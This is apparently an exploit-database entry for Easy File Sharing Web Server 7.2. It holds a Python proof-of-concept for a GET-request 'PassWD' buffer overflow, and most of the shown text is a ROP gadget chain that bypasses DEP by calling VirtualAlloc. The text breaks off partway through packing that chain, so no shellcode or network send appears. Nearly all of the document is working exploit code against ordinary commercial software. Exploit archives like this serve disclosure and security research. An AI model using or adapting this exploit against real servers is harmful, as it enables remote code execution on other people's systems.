Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)

Properties

Published:
10.07.2017
Target:
Easy File Sharing Web Server 7.2

Code

#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP)
# Date: 8 July 2017
# Exploit Author: Sungchul Park
# Author Contact: lxmania7@gmail.com
# Vendor Homepage: http://www.sharing-file.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server 7.2
# Tested on: Windows 7 SP1
 
import socket, struct
 
def create_rop_chain():
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        # For EDX -> flAllocationType(0x1000) [ EAX to EBX ]
        # 0x00000000,  # [-] Unable to find gadget to put 00001000 into edx
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xFFFFEFFF,  # -1001 (static value)
        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
        0x1001614d,  # DEC EAX # RETN [ImageLoad.dll] 
        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
         
        # For EDX -> flAllocationType(0x1000) [ EBX to EDX ]
        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
        0x10022c1e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] 
        0xffffffff,  # Filler (Compensation for POP EBX)
         
        # For ESI -> &VirtualAlloc
        0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
        0xffffffff,  # Filler \
        0xffffffff,  # Filler  |
        0xffffffff,  # Filler  | => (Compensation for RETN 0x10)
        0xffffffff,  # Filler /
        0x1004d1fc,  # ptr to &VirtualAlloc() [IAT ImageLoad.dll]
        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 
        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll] 
        0x1001aeb4,  # POP ESI # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x1001715d,  # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] 
        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 
         
        # For EBP -> Return Address
        0x10013860,  # POP EBP # RETN [ImageLoad.dll] 
        0x61c24169,  # & push esp # ret  [sqlite3.dll]
         
        # For EBX -> dwSize(0x01)
        0x100132ba,  # POP EBX # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x61c2785d,  # INC EBX # ADD AL,83 # RETN [sqlite3.dll] 
        0x1001f6da,  # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] 
                 
        # For ECX -> flProtect(0x40)
        0x10019dfa,  # POP ECX # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
         
        # For EDI -> ROP NOP
        0x61c373a4,  # POP EDI # RETN [sqlite3.dll] 
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        # For EAX -> NOP(0x90)
        0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
        0x90909090,  # nop
        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll] 
    ]
    return ''.join(struct.pack('